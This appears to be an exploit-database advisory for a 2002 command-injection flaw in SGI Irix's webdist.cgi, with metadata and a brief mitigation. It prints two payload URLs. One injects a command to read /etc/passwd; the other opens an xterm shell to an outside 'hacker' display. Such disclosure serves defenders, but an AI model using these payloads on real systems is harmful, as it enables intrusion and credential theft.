header-logo
Suggest Exploit
vendor:
Irix Operating System
by:
SecurityFocus
7.5
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: Irix Operating System
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: o:sgi:irix:6.5.22
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Irix
2002

Remote Command Execution Vulnerability in webdist.cgi

A vulnerability exists in the webdist.cgi program, as shipped by Silicon Grpahics Inc with the Irix operating system. This vulnerability will allow any remote user to execute arbitrary commands on an affected machine. Commands will be executed with the privileges of the httpd daemon. An example of the exploit is '/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd' or 'http://host/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh'

Mitigation:

Restrict access to the webdist.cgi program, and ensure that it is not accessible from untrusted networks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/374/info


A vulnerability exists in the webdist.cgi program, as shipped by Silicon Grpahics Inc with the Irix operating system. This vulnerability will allow any remote user to execute arbitrary commands on an affected machine. Commands will be executed with the privileges of the httpd daemon.

/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd

or

http://host/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh